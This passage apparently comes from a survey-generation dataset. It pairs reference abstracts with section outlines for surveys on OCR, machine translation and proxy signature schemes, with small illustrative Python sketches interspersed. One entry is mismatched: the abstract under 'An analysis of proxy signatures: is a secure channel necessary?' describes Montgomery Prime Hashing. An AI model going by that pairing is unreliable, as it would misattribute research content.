is tested on real images. It is observed from the experiment that the developed system successfully detects and recognizes the vehicle number plate on real images. --- paper_title: Neuro semantic thresholding using OCR software for high precision OCR applications paper_content: This paper describes a novel approach to binarization techniques. It presents a way of obtaining a threshold that depends both on the image and the final application using a semantic description of the histogram and a neural network. The intended applications of this technique are high precision OCR algorithms over a limited number of document types. The input image histogram is smoothed and its derivative is found.
Using a polygonal version of the derivative and the smoothed histogram, a new description of the histogram is calculated. Using this description and a training set, a general neural network is capable of obtaining an optimum threshold for our application. (A minimal global-thresholding sketch is given after this reference list.) --- paper_title: A Generalized Thinning Algorithm for Cursive and Non-Cursive Language Scripts paper_content: One of the most crucial phases in the process of text recognition is thinning of characters to a single-pixel notation. The success measure of any thinning algorithm lies in its ability to retain the original character shape while producing unit-width skeletons. No agreed universal thinning algorithm exists to produce character skeletons from different languages, which is a pre-process for all subsequent phases of character recognition such as segmentation, feature extraction, classification, etc. Written natural languages, based on their intrinsic properties, can be classified as cursive and non-cursive. Thinning algorithms, when applied to cursive languages, pose greater complexity due to their distinct non-isolated boundaries and complex character shapes, such as in Arabic, Sindhi, Urdu, etc. Such algorithms can easily be extended for parallel implementations. Selecting certain pixel arrangement grid templates over other pixel patterns for the purpose of generating character skeletons exploits parallel programming. The key to success is in determining the right pixel arrangement grids that can reduce the cost of the iterations required to evaluate each pixel for thinning or ignoring. This paper presents an improved parallel thinning algorithm, which can easily be extended to cursive or non-cursive languages alike by introducing a modified set of preservation rules via pixel arrangement grid templates, making it both robust to noise and fast. Experimental results show its success over cursive languages like Arabic, Sindhi, Urdu and non-cursive languages like English, Chinese and even numerals, thus making it probably a universal thinning algorithm. --- paper_title: Convolutional Neural Network Committees for Handwritten Character Classification paper_content: In 2010, after many years of stagnation, the MNIST handwriting recognition benchmark record dropped from 0.40% error rate to 0.35%. Here we report 0.27% for a committee of seven deep CNNs trained on graphics cards, narrowing the gap to human performance. We also apply the same architecture to NIST SD 19, a more challenging dataset including lower and upper case letters. A committee of seven CNNs obtains the best results published so far for both NIST digits and NIST letters. The robustness of our method is verified by analyzing 78125 different 7-net committees. ---
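The thresholding reference above treats binarization as the entry point of an OCR pipeline. For comparison, the following Python/NumPy sketch implements plain global Otsu thresholding (maximizing between-class variance), not the neuro-semantic method of the paper, and runs it on a small synthetic "page".

```python
import numpy as np

def otsu_threshold(gray):
    """Return the Otsu threshold of a uint8 grayscale image."""
    hist = np.bincount(gray.ravel(), minlength=256).astype(float)
    prob = hist / hist.sum()
    best_t, best_var = 0, -1.0
    for t in range(1, 256):
        w0, w1 = prob[:t].sum(), prob[t:].sum()
        if w0 == 0.0 or w1 == 0.0:
            continue
        mu0 = (np.arange(t) * prob[:t]).sum() / w0
        mu1 = (np.arange(t, 256) * prob[t:]).sum() / w1
        between = w0 * w1 * (mu0 - mu1) ** 2   # between-class variance
        if between > best_var:
            best_var, best_t = between, t
    return best_t

# synthetic "page": bright background with one dark stroke of "ink"
img = np.full((64, 64), 200, dtype=np.uint8)
img[20:24, 10:50] = 30
t = otsu_threshold(img)
binary = (img < t).astype(np.uint8)   # 1 = ink, 0 = background
print("threshold:", t, "ink pixels:", int(binary.sum()))
```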
Title: A Survey on Optical Character Recognition System Section 1: Literature Review Description 1: Summarize the historical background and evolution of Optical Character Recognition (OCR) systems from early mechanical devices to modern advancements, including key milestones and research developments. Section 2: Types of Optical Character Recognition Systems Description 2: Discuss the various categories of OCR systems based on different criteria such as image acquisition mode, character connectivity, and font restrictions. Highlight the characteristics and challenges of different types. Section 3: Major Phases of OCR Description 3: Outline the primary steps involved in the OCR process, detailing each phase along with its significance and common techniques used. Section 4: Image Acquisition Description 4: Elaborate on the initial step of OCR which involves capturing and converting a digital image into a suitable format for processing. Discuss techniques like quantization and compression. Section 5: Pre-processing Description 5: Describe the methods used to enhance the quality of the captured image including thresholding, filtering, morphological operations, and skew estimation. Section 6: Character Segmentation Description 6: Explain the process of segmenting the image into individual characters, and how this step is crucial for effective classification. Section 7: Feature Extraction Description 7: Investigate the techniques used to extract distinctive features from segmented characters. Discuss the importance of selecting the right features and methods like principal component analysis. Section 8: Classification Description 8: Detail the methods used to classify characters into appropriate categories using structural and statistical approaches. Mention common classifiers such as Bayesian, neural networks, and decision trees. Section 9: Post-processing Description 9: Discuss techniques to enhance the accuracy of OCR results after initial classification, including the use of multiple classifiers, contextual analysis, and lexical processing. Section 10: Conclusion Description 10: Provide a summary of the paper, highlighting the importance of each phase in OCR, potential applications, current challenges especially in recognizing complex languages, and recommendations for future research directions.
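To make the feature-extraction and classification phases sketched in Sections 7 and 8 of the outline more concrete, here is a minimal Python/NumPy illustration using simple zoning features (ink density per grid cell) and a nearest-centroid rule on two invented 8x8 character templates; production OCR engines use far richer features and classifiers.

```python
import numpy as np

def zoning_features(binary, grid=(4, 4)):
    """Split a binary character image into a grid and return per-zone ink densities."""
    h, w = binary.shape
    gh, gw = grid
    feats = []
    for i in range(gh):
        for j in range(gw):
            zone = binary[i * h // gh:(i + 1) * h // gh,
                          j * w // gw:(j + 1) * w // gw]
            feats.append(zone.mean())
    return np.array(feats)

def classify(x, centroids):
    """Nearest-centroid classification over the zoning features."""
    return min(centroids, key=lambda label: np.linalg.norm(x - centroids[label]))

# invented 8x8 templates standing in for training data
I = np.zeros((8, 8), dtype=int); I[:, 3:5] = 1                       # a vertical bar
O = np.zeros((8, 8), dtype=int); O[1:7, 1:7] = 1; O[2:6, 2:6] = 0    # a ring
centroids = {"I": zoning_features(I), "O": zoning_features(O)}
print(classify(zoning_features(I), centroids))   # -> "I"
```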
A Survey Of Machine Translation: Its History, Current Status, And Future Prospects
13
--- paper_title: Computerized russian translation at ORNL paper_content: Since 1964, as an adjunct to its automated technical information processing services to ERDA and other federal agencies, a generalized language translation system has been used by the Oak Ridge National Laboratory (ORNL) to translate Russian scientific text to English. The translation system, first implemented at Georgetown University around 1960, has been rewritten and improved through the years as computer models changed. Although the translations lack high literary quality, the system, by means of its context sensitive dictionary, nevertheless provides inexpensive, fast and highly useful translations of scientific literature. The method used involves a linguistically‐oriented programming language called Simulated Linguistic Computer (SLC), with which a language‐specific dictionary can be written for use by the translation system. The dictionary entry for any word can be augmented by procedures which permit its meaning to be modified by its context; more general linguistic procedures operate on the sentence as a whole. In an evaluation of user reaction, over ninety percent of the respondents rated the machine translation (MT) service “good” or “acceptable” on translations of their subject specialty. Development, implementation, and documentation of the system are continuing, as we meet increasing requests for service and attempt new applications of the MT system. --- paper_title: Multi-Level Translation Aids In A Distributed System paper_content: At COLING80, we reported on an Interactive Translation System called ITS. We will discuss three problems in the design of the first version of ITS: (1) human factors, (2) the "all or nothing" syndrome, and (3) traditional centralized processing. We will also discuss a new version of ITS, which is now being programmed. This new version will hopefully overcome these problems by placing the translator in control, providing multiple levels of aid, and distributing the processing. --- paper_title: QUALITY CONTROL PROCEDURES IN MODIFICATION OF THE AIR FORCE RUSSIAN-ENGLISH MT SYSTEM paper_content: The paper gives the background leading to the development of current quality control procedures used in modification of the Russian-English system. A special program showing target language translation differences has become the central control mechanism. Procedures for modification of dictionaries, homographs and lexicals, and generalized linguistic modules are discussed in detail. A final assessment is made of the procedures and the quantitative results that can be obtained when they are used. --- paper_title: Further Experiments in Language Translation: A Second Evaluation of the Readability of Computer Translations, paper_content: Application of computational linguistics, i.e., language translation by computer, has been proposed as a means of producing readable translations of technical English-to-Vietnamese. This report is about an experimental study of the readability of translations that could be used for training or equipment maintenance. The experiments involved assessing the readability of Vietnamese that had been translated from English by three methods: (1) expert human translators, (2) un-edited translation by computer, and (3) edited computer translation. English was a control condition. Readers included two groups of student pilots : 168 in the Vietnamese Air Force (VNAF) and 88 in the USAF. 
Material that was translated consisted of three 500-word passages sampled from a standard Air Force text, Instrument Flying. Readability was measured by: (1) reading comprehension tests, (2) cloze procedure, and (3) clarity ratings. Time to complete each of these tasks was also measured. Major conclusions of the study are: (1) expert human translators produce more readable translations of technical English-to-Vietnamese than is done by computer; (2) Vietnamese readers, trained in English, show the highest comprehension when dealing with that language; (3) comprehension loss becomes relatively greater, as more and more difficult material is read, for computer-based translations than for human translations; (4) method of translation does not affect reading speed. --- paper_title: AN INTERACTIVE ON-LINE MACHINE TRANSLATION SYSTEM (CHINESE INTO ENGLISH) paper_content: The present on-line system is a direct conversion of the CULT (batch) machine translation system which has been used since January 1975 on a regular basis in translating Chinese mathematics journals. The pre-editing procedures used in CULT are being implemented in the present on-line system by means of editing programs. The enormous problem of inputting Chinese texts is being solved by keying the text directly with a newly designed Chinese keyboard. --- paper_title: Machine Translation - Past, Present, and Future paper_content: The attempt to translate meaning from one language to another by formal means traces back to the philosophical schools of secret and universal languages as they were originated by Ramon Llull or Johann Joachim Becher. Until today, machine translation (MT) is known as the crowning discipline of natural language processing. Due to current MT approaches, the time needed to develop new systems with similar power to the older ones has decreased enormously. However, when comparing current achievements to those of thirty years ago, only a minor difference in the number and type of errors can be observed. In this article, the history of MT, the difference from computer-aided translation and the current approaches are discussed. --- paper_title: An Application Of MONTAGUE Grammar To English-Japanese Machine Translation paper_content: English-Japanese machine translation requires a large amount of structural transformation at both the grammatical and conceptual levels. In order to make its control structure clearer and more understandable, this paper proposes a model based on Montague Grammar. The translation process is modeled as a data flow computation process. Formal description tools are developed and a prototype system is constructed. Various problems which arise in this modeling and their solutions are described. Results of experiments are shown and it is discussed how far the initial goals are achieved. --- paper_title: Knowledge Representation And Machine Translation paper_content: This paper describes a new knowledge representation called "frame knowledge representation-0" (FKR-0), and an experimental machine translation system named ATLAS/I which uses FKR-0. The purpose of FKR-0 is to store information required for machine translation processing as flexibly as possible, and to make the translation system as expandable as possible.
--- paper_title: Design Characteristics of a Machine Translation System paper_content: This paper distinguishes a set of criteria to be met by a machine translation system (EUROTRA) currently being planned under the sponsorship of the Commission of the European Communities and attempts to show the effect of meeting those criteria on the overall system design. ---
Title: A Survey Of Machine Translation: Its History, Current Status, And Future Prospects Section 1: INTRODUCTION Description 1: This section provides a historical overview and sets the context for the survey, highlighting the different phases of MT's development and its current resurgence. Section 2: THE HUMAN TRANSLATION CONTEXT Description 2: This section discusses the standards and practices of human translation, contrasting them with machine translation, and emphasizing the importance of post-editing and domain expertise. Section 3: MACHINE TRANSLATION TECHNOLOGY Description 3: This section delves into the various categories, purposes, and technologies behind machine translation, explaining the broad classifications and specific applications for MT. Section 4: CATEGORIES OF SYSTEMS Description 4: This section categorizes translation tools into Machine Translation (MT), Machine-aided Translation (MAT), and Terminology Data banks, describing their different levels of human intervention and use cases. Section 5: THE PURPOSES OF TRANSLATION Description 5: This section explores the main purposes of translation, differentiating between information acquisition and information dissemination, and the specific needs for rapid and precise translations in different contexts. Section 6: INTENDED APPLICATIONS OF M(A)T Description 6: This section identifies the primary applications for Machine-aided Translation (MAT) systems, particularly in the field of technical translation, and contrasts it with the lesser demand for literary translation. Section 7: LINGUISTIC TECHNIQUES Description 7: This section reviews the different linguistic techniques employed in MT systems, distinguishing between direct and indirect translation, interlingua and transfer approaches, and local versus global scope. Section 8: HISTORICAL PERSPECTIVE Description 8: This section provides a detailed history of various notable MT projects and systems, such as GAT, TIQUE, METAL, TAUM, ALP, and others, outlining their development, challenges, and impacts. Section 9: CURRENT PRODUCTION SYSTEMS Description 9: This section identifies and reviews the major Machine Translation systems and Machine-aided Translation systems currently in use or marketed, discussing their implementations and user experiences. Section 10: CURRENT RESEARCH AND DEVELOPMENT Description 10: This section surveys ongoing research and development efforts in MT, highlighting projects in Japan, Europe, and the U.S., and discussing their goals and innovations. Section 11: THE STATE OF THE ART Description 11: This section evaluates the current state of MT technology, analyzing the capabilities, limitations, and progress in production systems, development systems, and research systems. Section 12: FUTURE PROSPECTS Description 12: This section forecasts the future of Machine Translation, predicting greater acceptance and integration of MT systems, the need for advanced R&D, and the evolving demands for translation services. Section 13: CONCLUSIONS Description 13: This section concludes the survey by summarizing the inevitability of MT development due to the persistent demand for translation, the successes of existing systems, and the necessity for continued research.
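Purely as a toy illustration of the "direct translation" strategy contrasted with interlingua and transfer approaches in Section 7 of the outline, the Python sketch below does word-for-word dictionary substitution plus one local reordering rule over an invented four-word English-Spanish lexicon; none of the surveyed systems is this simple.

```python
# invented English -> Spanish lexicon for the toy example
lexicon = {"the": "el", "red": "rojo", "car": "coche", "stops": "para"}
ADJ, NOUN = {"red"}, {"car"}     # tiny hand-made word classes

def direct_translate(sentence: str) -> str:
    words = sentence.lower().split()
    # local reordering: English adjective-noun becomes Spanish noun-adjective
    for i in range(len(words) - 1):
        if words[i] in ADJ and words[i + 1] in NOUN:
            words[i], words[i + 1] = words[i + 1], words[i]
    # word-for-word lookup; untranslated words are passed through in upper case
    return " ".join(lexicon.get(w, w.upper()) for w in words)

print(direct_translate("The red car stops"))   # -> "el coche rojo para"
```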
Algorithms and Approaches of Proxy Signature: A Survey
13
--- paper_title: Proxy multi-signature scheme: a new type of proxy signature scheme paper_content: Proxy signature schemes allow a proxy signer to generate a proxy signature on behalf of an original signer. However, since in previous proxy signature schemes a proxy signature is created on behalf of only one original signer, these schemes are referred to as proxy mono-signature schemes. A new type of proxy signature scheme, called the proxy multi-signature scheme, is presented, in which a proxy signer can generate a proxy signature on behalf of two or more original signers. --- paper_title: Repudiation of Cheating and Non-repudiation of Zhang's Proxy Signature Schemes paper_content: The paper discusses the correctness of Lee, Hwang and Wang's comments on Zhang's proxy signature schemes. In particular, it is shown that the cheating attack proposed by Lee, Hwang and Wang can be detected by the owner of the signature scheme. It is argued that, considering the context in which proxy signatures are used, the attack is not a security problem. The work is concluded by a discussion about the non-repudiation controversy incorrectly observed by Lee, Hwang and Wang. --- paper_title: The Digital Distributed System Security Architecture paper_content: The Digital Distributed System Security Architecture is a comprehensive specification for security in a distributed system that employs state-of-the-art concepts to address the needs of both commercial and government environments. The architecture covers user and system authentication, mandatory and discretionary security, secure initialization and loading, and delegation in a general-purpose computing environment of heterogeneous systems where there are no central authorities, no global trust, and no central controls. The architecture prescribes a framework for all applications and operating systems currently available or to be developed. Because the distributed system is an open OSI environment, where functional interoperability only requires compliance with selected protocols needed by a given application, the architecture must be designed to securely support systems that do not implement or use any of the security services, while providing extensive additional security capabilities for those systems that choose to implement the architecture. --- paper_title: Proxy signature schemes based on factoring paper_content: Proxy signature schemes allow proxy signers to sign messages on behalf of an original signer, a company or an organization. However, most existing proxy signature schemes are based on the discrete logarithm problem. In this paper, the author proposes two efficient proxy signature schemes based on the factoring problem, which combine the RSA signature scheme and the Guillou-Quisquater signature scheme. One is a proxy-unprotected signature scheme that is more efficient: no matter how many proxy signers cooperatively sign a message, the computation load for verifiers remains almost constant. The other is a proxy-protected signature scheme that is more secure. Finally, to protect the privacy of proxy signers, the author proposes a proxy-protected signature scheme with anonymous proxy signers. --- paper_title: Revisiting Fully Distributed Proxy Signature Schemes paper_content: In a proxy signature scheme, a potential signer delegates his capabilities to a proxy signer, who can sign documents on his behalf. The recipient of the signature verifies both identities: that of the delegator and that of the proxy signer.
There are many proposals of proxy signature schemes, but their security had not been considered in a formal way until the appearance of [2,8]. If the entities which take part in a proxy signature scheme are formed by sets of participants, then we refer to it as a fully distributed proxy signature scheme [4]. In this work, we extend the security definitions introduced in [2] to the scenario of fully distributed proxy signature schemes, and we propose a specific scheme which is secure in this new model. --- paper_title: Improved Non-Repudiable Threshold Proxy Signature Scheme with Known Signers paper_content: In 2001, Hsu et al. proposed a non-repudiable threshold proxy signature with known signers. In their scheme, the proxy group cannot deny having signed the proxy signature if they did. However, Hsu et al.'s scheme is vulnerable to some attacks. A malicious original signer or malicious proxy signer can impersonate some other proxy signers to generate proxy signatures. In this article, we shall present our cryptanalysis of Hsu et al.'s scheme. After that, we shall propose a new threshold proxy signature that can overcome the weaknesses. --- paper_title: The Hierarchy of Key Evolving Signatures and a Characterization of Proxy Signatures paper_content: For the last two decades the notion and implementations of proxy signatures have been used to allow transfer of digital signing power within some context (in order to enable flexibility of signers within organizations and among entities). On the other hand, various notions of the key-evolving signature paradigms (forward-secure, key-insulated, and intrusion-resilient signatures) have been suggested in the last few years for protecting the security of signature schemes, localizing the damage of secret key exposure. In this work we relate the various notions via direct and concrete security reductions that are tight. We start by developing the first formal model for fully hierarchical proxy signatures, which, as we point out, also addresses vulnerabilities of previous schemes when self-delegation is used. Next, we prove that proxy signatures are, in fact, equivalent to key-insulated signatures. We then use this fact and other results to establish a tight hierarchy among the key-evolving notions, showing that intrusion-resilient signatures and key-insulated signatures are equivalent, and imply forward-secure signatures. We also introduce other relations among extended notions. Besides the importance of understanding the relationships among the various notions that were originally designed with different goals or with different system configurations in mind, our findings imply new designs of schemes. For example, many proxy signatures have been presented without formal models and proofs, whereas using our results we can employ the work on key-insulated schemes to suggest new provably secure designs of proxy signature schemes. --- paper_title: Efficient proxy multisignature schemes based on the elliptic curve cryptosystem paper_content: To improve proxy-signature research, Sun [5] attempted to resolve problems related to defective security in the scheme of Yi [3]. However, both Yi and Sun's schemes involve a significant number of exponential operations to verify the proxy signature. Accordingly, an improvement is proposed here to change the exponential operations into elliptic curve multiplicative ones. As proposed by both Koblitz [6-7] and Miller [8] in 1985, the elliptic curve is used in developing the cryptosystems.
The elliptic curve cryptosystem can achieve a level of security equal to that of RSA or DSA but has a lower computational overhead and a smaller key size than both of these. Therefore, it is used in Sun's schemes to improve their efficiency. --- paper_title: Threshold proxy signatures paper_content: A (t, n) threshold proxy signature scheme allows t or more proxy signers from a designated group of n proxy signers to sign messages on behalf of an original signer. The authors review both Zhang's threshold proxy signature scheme and Kim's threshold proxy signature scheme. They show that Zhang's scheme suffers from some weaknesses and Kim's scheme suffers from a disadvantage. Based on Zhang's scheme, they propose a new threshold proxy signature scheme to defeat the weaknesses of Zhang's scheme and the disadvantage of Kim's scheme. --- paper_title: An efficient nonrepudiable threshold proxy signature scheme with known signers paper_content: A (t,n) threshold proxy signature scheme allows t or more proxy signers from a designated group of n proxy signers to sign messages on behalf of an original signer. A threshold proxy signature scheme with the nonrepudiation property is a scheme with the capability that any verifier can identify the proxy group which is responsible for a proxy signature, while the proxy group cannot deny. So far, there have been two threshold proxy signature schemes proposed. Of these, Kim's scheme is nonrepudiable, but Zhang's scheme is not. In these two schemes, the t proxy signers from the group who actually sign the message are unknown and unidentified. This is very inconvenient for auditing purposes. For the responsibility of the actual signers and the traceability of adversarial signers, it is sometimes necessary to identify who the actual signers are. In this article, we propose the nonrepudiable threshold proxy signature scheme with known signers which is a nonrepudiable threshold proxy signature scheme with the property that the actual signers from the proxy group are known and identified. --- paper_title: Convertible Nominative Signatures paper_content: A feasible solution to prevent potential misuse of signatures is to put some restrictions on their verification. Therefore S.J.Kim, [4] S.J.Park and D.H.Won introduced the nominative signature, in which only the nominee can verify and prove the validity of given signatures, and proposed a nominative signature scheme (called KPW scheme). In this paper, we first show that KPW scheme is not nominative because the nominator can also verify and prove the validity of given signatures. Then we extend the concept of nominative signature to the convertible nominative signature which has an additional property that the nominee can convert given nominative signatures into universally verifiable signatures. We give a formal definition for it and propose a practical scheme that implements it. The proposed scheme is secure, in which its unforgeability is the same as that of the Schnorr’s signature scheme and its untransferability relies on the hardness of the Decision-Diffie-Hellman Problem. --- paper_title: Secure Mobile Agent Digital Signatures with Proxy Certificates paper_content: Security issues related to the usage of mobile agents in performing operations to which their owners have to be bound, such as payments, are of utmost importance if this kind of agents are to be used in electronic commerce. 
If this binding is achieved by means of digital signature techniques, this means agents have to carry the owner's private key to the host where they sign documents. This exposes the key to attacks because it is copied outside a protected environment. In this paper, we present a mechanism, called proxy certificates, that avoids the need for the agent to have access to the user's private key for digitally signing documents, but still binds the owner to the contents of those documents. In order to support our claims, we apply the mechanism to SET/A, an agent-based payment system we proposed in previous work. We also analyze the emerging technology of attribute certificates and argue that it is appropriate to implement proxy certificates. --- paper_title: Improvement of threshold proxy signature scheme paper_content: Abstract A (t, n) threshold proxy signature scheme allows any t or more proxy signers to cooperatively sign messages on behalf of an original signer, but t−1 or fewer proxy signers cannot. Sun et al. proposed a new (t, n) threshold proxy signature scheme based on Zhang's threshold proxy signature scheme. Recently, Hsu et al. pointed out that Sun's scheme suffered from a drawback and proposed an improvement to counter it. However, the author of this paper shows that both Sun's scheme and Hsu's improvement are not secure against coalition attack. Some t or more malicious proxy signers can conspire together against the original signer. Finally, we propose a new improvement to counter this attack, the proxy generation and the signature computation of which is more efficient than those of Sun's scheme and Hsu's improvement. The main advantage of the new improvement is traceability, by which the original signer can identify the actual signers that are anonymous to outsiders. --- paper_title: A SECURE NONREPUDIABLE THRESHOLD PROXY SIGNATURE SCHEME WITH KNOWN SIGNERS paper_content: In the (t;n) proxy signature scheme, the signature, originally signed by a signer, can be signed by t or more proxy signers out of a proxy group of n members. Recently, an efficient nonrepudiable threshold proxy signature scheme with known signers was proposed by H.-M. Sun. Sun's scheme has two advantages. One is nonrepudiation. The proxy group cannot deny that having signed the proxy signature. Any verifier can identify the proxy group as a real signer. The other is identifiable signers. The verifier is able to identify the actual signers in the proxy group. Also, the signers cannot deny that having generated the proxy signature. In this article, we present a cryptanalysis of the Sun's scheme. Further, we propose a secure, nonrepudiable and known signers threshold proxy signature scheme which remedies the weakness of the Sun's scheme. --- paper_title: Handbook of Applied Cryptography paper_content: From the Publisher: ::: A valuable reference for the novice as well as for the expert who needs a wider scope of coverage within the area of cryptography, this book provides easy and rapid access of information and includes more than 200 algorithms and protocols; more than 200 tables and figures; more than 1,000 numbered definitions, facts, examples, notes, and remarks; and over 1,250 significant references, including brief comments on each paper. --- paper_title: Threshold Proxy Signature Schemes paper_content: Delegation of rights is a common practice in the real world. Proxy signature schemes have been invented to delegate signing capability efficiently and transparently. 
In this paper, we present a new nonrepudiable proxy signature scheme. Nonrepudiation means the signature signers, both original and proxy signers, cannot falsely deny later that he generated a signature. In practice, it is important and, sometimes, necessary to have the ability to know who is the actual signer of a proxy signature for internal auditing purpose or when there is abuse of signing capability. The new nonrepudiable proxy signature scheme also has other desirable properties, such as proxy signature key generation and updating using insecure channels. We also show how to construct threshold proxy signature schemes with an example. Threshold signatures are motivated both by the need that arises in some organizations to have a group of employees agree on a given message (or a document) before signing it, as well as by the need to protect signature keys from the attack of internal and external adversaries. Our approach can also be applied to other ElGamal-like proxy signature schemes. --- paper_title: Proxy signatures, Revisited paper_content: Proxy signatures, introduced by Mambo, Usuda and Okamoto allow a designated person to sign on behalf of an original signer. This paper first presents two new types of digital proxy signatures called partial delegation with warrant and threshold delegation. Proxy signatures for partial delegation with warrant combines the benefit of Mambo's partial delegation and Neuman's delegation by warrant, and then in threshold delegation the proxy signer's power to sign messages is shared. Moreover, we also propose straightforward and concrete proxy signature schemes satisfying our conditions. --- paper_title: Further Cryptanalysis of some Proxy Signature Schemes paper_content: Proxy signature is a signature that an original signer delegates his or her signing capability to a proxy signer, and then the proxy signer creates a signature on behalf of the original signer. However, Sun et al. [7] showed that the proxy and multi-proxy signatures of Lee et al. [3], and the strong proxy signature scheme with proxy signer privacy protection of Shum et al. [6] are not against the original signer’s forgery attack, so these schemes do not process the property of unforgeability. In this paper, we present an extensive forgery method on these schemes, following the work due to Sun et al. --- paper_title: Comments on "A practical (t, n) threshold proxy signature scheme based on the RSA cryptosystem" paper_content: In a (t, n) threshold proxy signature scheme, the original signer can delegate his/her signing capability to n proxy signers such that any t or more proxy signers can sign messages on behalf of the former, but t-1 or less of them cannot do the same thing. Such schemes have been suggested for use in a number of applications, particularly, in distributed computing where delegation of rights is quite common. Based on the RSA cryptosystem, [M. -S. Hwang et al. (2003) recently proposed an efficient (t, n) threshold proxy signature scheme. We identify several security weaknesses in their scheme and show that their scheme is insecure. --- paper_title: An Efficient Signature Scheme from Bilinear Pairings and Its Applications paper_content: In Asiacrypt2001, Boneh, Lynn, and Shacham [8] proposed a short signature scheme (BLS scheme) using bilinear pairing on certain elliptic and hyperelliptic curves. Subsequently numerous cryptographic schemes based on BLS signature scheme were proposed. BLS short signature needs a special hash function [6,1,8]. 
This hash function is probabilistic and generally inefficient. In this paper, we propose a new short signature scheme from the bilinear pairings that unlike BLS, uses general cryptographic hash functions such as SHA-1 or MD5, and does not require special hash functions. Furthermore, the scheme requires less pairing operations than BLS scheme and so is more efficient than BLS scheme. We use this signature scheme to construct a ring signature scheme and a new method for delegation. We give the security proofs for the new signature scheme and the ring signature scheme in the random oracle model. --- paper_title: An analysis of proxy signatures: is a secure channel necessary? paper_content: Montgomery Prime Hashing (MPH) is a scheme for message authentication based on universal hashing.I n MPH, roughly speaking, the hash value is computed as the Montgomery residue of the message with respect to a secret modulus.The modulus value is structured in a way that allows fast, compact implementations in both hardware and software.The set of allowed modulus values is large, and as a result, MPH achieves good, provable security. ::: ::: MPH performance is comparable to that of other high-speed schemes such as MMH. An advantage of MPH is that the secret key (i.e., the modulus) is small, typically 128-256 bits, while in MMH the secret key is typically much larger.I n applications where MMH key length is problematic, MPH may be an attractive alternative. --- paper_title: A Digital Nominative Proxy Signature Scheme for Mobile Communication paper_content: Based on the development of mobile communication, the future mobile communication systems are expected to provide higher quality of multimedia services for users than today's systems. Therefore, many technical factors are needed in this systems. Especially the secrecy and the safety would be obtained through the introduction of the security for mobile communication. In this paper, we presents a digital nominative proxy signature scheme that processes a user's digital signature and encryption using the proxy-agent who has more computational power than origins in mobile communication. --- paper_title: On Zhang's Nonrepudiable Proxy Signature Schemes paper_content: In 1997, Zhang proposed two new nonrepudiable proxy signature schemes to delegate signing capability. Both schemes claimed to have a property of knowing that a proxy signature is generated by either the original signer or a proxy signer. However, this paper will show that Zhang's second scheme fails to possess this property. Moreover, we shall show that the proxy signer can cheat to get the original signer's signature, if Zhang's scheme is based on some variants of ElGamal-type signature schemes. We modify Zhang's nonrepudiable proxy signature scheme to avoid the above attacks. The modified scheme also investigates a new feature for the original signer to limit the delegation time to a certain period. --- paper_title: Design of time-stamped proxy signatures with traceable receivers paper_content: A proxy signature scheme is a method which allows an original signer to delegate his signing power to a proxy signer. Most proxy signature schemes use a warrant appearing in the signature verification equation to declare the valid delegation period. However, the declaration in the warrant is useless because no-one can know the exact time when the proxy signer signed a message. 
To avoid the proxy signer abusing the signing capability, the original signer may hope to know the identity of who received the proxy signature from the proxy signer. Recently Sun and Chen proposed the concept of time-stamped proxy signatures with traceable receivers to solve these two problems. A time-stamped proxy signature scheme with traceable receivers is a proxy signature scheme which can ascertain whether a proxy signature is created during the delegation period, and can trace who actually received the proxy signatures from the proxy signer. The author shows that Sun and Chen's scheme suffers from weaknesses and consequently proposes a new time-stamped proxy signature scheme which doesn't suffer from the same weaknesses. --- paper_title: ID-Based Multi-Proxy Signature and Blind Multisignature from Bilinear Pairings paper_content: Multi-proxy signature allows the original signer delegate his singing power to a group of proxy signers. Blind proxy-signature allows the user to obtain a signature of a message from several signers in a way that each signer learns neither the message nor the resulting signature. Plenty of multi-proxy signature and blind multisignature schemes have been proposed under the certificate-based (CA-based) public key systems. In this paper, we firstly propose an identity-based (IDbased) multi-proxy signature scheme and an ID-based blind multisignature scheme from bilinear pairings. Since there seems no ID-based threshold signature schemes up to now, both the proposed schemes can be regarded as a special case of corresponding variants of ID-based threshold signature. --- paper_title: Cryptanalysis of Nonrepudiable Threshold Proxy Signature Schemes with Known Signers paper_content: Sun's nonrepudiation threshold proxy signature scheme is not secure against the collusion attack. In order to guard against the attack, Hwang et al. proposed another threshold proxy signature scheme. However, a new attack is proposed to work on both Hwang et al.'s and Sun's schemes. By executing this attack, one proxy signer and the original signer can forge any valid proxy signature. Therefore, both Hwang et al.'s scheme and Sun's scheme were insecure. --- paper_title: A strong proxy signature scheme with proxy signer privacy protection paper_content: Mambo et al. (1996) discussed the delegation of signature power to a proxy signer. Lee et al. (2001) constructed a strong non-designated proxy signature scheme in which the proxy signer had strong non-repudiation. In this paper, we present an enhancement to their scheme such that the identity of the proxy signer is hidden behind an alias. The identity can be revealed only by the alias authority. We also discuss other applications of this technique. --- paper_title: New Proxy Signature, Proxy Blind Signature and Proxy Ring Signature Schemes from Bilinear Pairings paper_content: Proxy signatures are very useful tools when one needs to delegate his/her signing capability to other party. After Mambo et al.’s first scheme was announced, many proxy signature schemes and various types of proxy signature schemes have been proposed. Due to the various applications of the bilinear pairings in cryptography, there are many IDbased signature schemes have been proposed. In this paper, we address that it is easy to design proxy signature and proxy blind signature from the conventional ID-based signature schemes using bilinear pairings, and give some concrete schemes based on existed ID-based signature schemes. 
At the same time, we introduce a new type of proxy signature – proxy ring signature, and propose the first proxy ring signature scheme based on an existed ID-based ring signature scheme. --- paper_title: A traceable proxy multisignature scheme based on the elliptic curve cryptosystem paper_content: This study contributes to the public delivery of the delegation parameter and reduces the number of operations required to verify a proxy signature. A new proxy-protected proxy multisignature scheme is also proposed, which is based on the elliptic curve discrete logarithm problem (ECDLP). The proposed scheme inherits most of its merits from typical solutions to the discrete logarithm problem (DLP), thereby meeting the demand for security. The scheme that is based on the elliptic curve cryptosystem (ECC) can perform more efficiently than those based on DLP. --- paper_title: Designated-verifier proxy signatures for e-commerce paper_content: In a designated-verifier proxy signature scheme, a user delegates her/his signing capability to another user in such a way that the latter can sign messages on behalf of the former, but the validity of generated signatures can only be checked by the designated verifier. In this paper, we first point out that one such scheme proposed recently by Dai et al. is insecure. To overcome the weaknesses in their scheme, based on the two-party Schnorr signature by Nicolosi et al., we present a new designated-verifier proxy signature scheme which is efficient and secure. Finally, we suggest the use of our scheme in electronic commerce applications, such as sale of digital products (digital music, movies, and books etc.). --- paper_title: On the Security of Some Proxy Signature Schemes paper_content: Digital signature scheme is an important research topic in cryptography. An ordinary digital signature scheme allows a signer to create signatures of documents and the generated signatures can be verified by any person. A proxy signature scheme, a variation of ordinary digital signature scheme, enables a proxy signer to sign messages on behalf of the original signer. To be used in different applications, many proxy signatures were proposed. In this paper, we review Lee et al.’s strong proxy signature scheme, multi-proxy 